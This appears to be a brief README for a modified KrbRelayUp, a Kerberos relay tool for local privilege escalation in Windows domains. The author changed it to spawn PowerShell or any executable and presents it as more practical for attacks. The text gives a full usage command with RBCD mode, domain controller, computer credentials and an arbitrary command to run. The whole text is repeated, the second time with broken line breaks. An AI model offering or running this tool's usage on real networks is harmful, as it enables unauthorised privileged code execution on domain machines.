Original version of KrbRelayUp could only spawn cmd.exe with a new window.
I modify the spawn process to make it more pratical in attack scenarios.
Now, it can spawn a powershell or other executable files in bin path like this.
./KrbRelayUp.exe spawn -m rbcd -d <domain> -dc <server_name> -cn <computer_name> -cp <computer_password> -sc "powershell.exe tasklist > C:\Windows\Temp\tasklist.txt"
Original version of KrbRelayUp could only spawn cmd.exe with a new window. I modify the spawn process to make it more pratical in attack scenarios.
Now, it can spawn a powershell or other executable files in
bin path
like this../KrbRelayUp.exe spawn -m rbcd -d <domain> -dc <server_name> -cn <computer_name> -cp <computer_password> -sc "powershell.exe tasklist > C:\Windows\Temp\tasklist.txt"